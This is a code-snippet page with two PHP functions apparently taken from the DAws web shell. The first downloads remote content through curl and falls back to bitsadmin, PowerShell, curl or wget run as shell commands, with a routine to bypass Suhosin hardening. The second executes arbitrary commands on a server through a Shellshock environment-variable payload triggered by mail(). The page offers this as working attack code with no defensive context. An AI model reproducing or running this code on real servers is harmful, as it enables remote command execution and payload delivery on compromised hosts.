Esempio n. 1
0
function url_get_contents($url, $user_agent = null)
{
    //used to download the source of a webpage
    if (installed_php("curl_version") == True && disabled_php("curl_init") == False) {
        //using curl
        if (disabled_suhosin("curl_init") == False) {
            $ch = curl_init(str_replace(" ", "%20", $url));
        } else {
            $ch = bypass_suhosin("curl_init", str_replace(" ", "%20", $url));
        }
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        if ($user_agent != null) {
            //used by shellshock (method 2)
            curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
        }
        $content = curl_exec($ch);
        curl_close($ch);
        return $content;
    }
    //for file_get_contents and fopen
    if ($user_agent != null) {
        $opts = array('http' => array('header' => "User-Agent: {$user_agent}\r\n"));
        $context = stream_context_create($opts);
    } else {
        $context = null;
    }
    //using file_get_contents
    $content = file_get_contents_extended($url, True, $context);
    if ($content != False) {
        return $content;
    }
    //using fopen
    $fp = fopen_extended($url, "r", True, $context);
    if ($fp != False) {
        $content = fread($fp, filesize($url));
        fclose($fp);
        return $content;
    }
    //using system commands (no need to apply shellshock here since we're already using system commands...)
    if ($_SESSION["windows"] == True) {
        if (execute_command("bitsadmin", True) == True) {
            //bitsadmin is a nice choice here
            return execute_command("bitsadmin.exe /Transfer DAwsDownloadJob {$link} {$location} > null; type {$location}");
        } else {
            if (strpos(execute_command("powershell.exe"), "Windows PowerShell")) {
                //powershell comes next
                return execute_command("powershell.exe Invoke-WebRequest {$link} -OutFile {$location} > null; type {$location}");
            } else {
                return False;
                //sadly, nothing worked
            }
        }
    } else {
        //curl or wget for Linux
        if (execute_command("curl", True) == True) {
            return execute_command("curl {$link} -o {$location} 2>&1; cat {$location}");
        } else {
            if (execute_command("wget", True) == True) {
                return execute_command("wget {$link} -O {$location} 2>&1; cat {$location}");
            } else {
                return False;
            }
        }
    }
}
Esempio n. 2
0
function shsh($command)
{
    $filename = $_SESSION["daws_directory"] . rand(1, 1000) . ".data";
    putenv("PHP_LOL=() { x; }; {$command} > {$filename} 2>&1");
    mail("a@127.0.0.1", "", "", "", "-bv");
    if (file_exists($filename)) {
        if (($content = file_get_contents_extended($filename)) == False) {
            $fp = fopen_extended($filename, "r");
            $content = htmlspecialchars(fread($fp, filesize($filename)));
            fclose($fp);
        }
        unlink($filename);
    } else {
        $content = "";
    }
    return $content;
}